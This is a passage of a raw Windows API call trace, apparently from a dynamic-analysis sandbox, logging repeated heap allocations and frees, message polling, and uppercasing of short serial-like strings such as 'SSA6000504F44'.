RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.464] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.465] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.466] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.468] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.469] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.469] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.470] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.470] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.471] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.471] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.471] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0265.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.471] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.472] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.473] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.473] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.474] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.474] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.474] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.475] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.475] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.476] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.476] HeapFree (in: 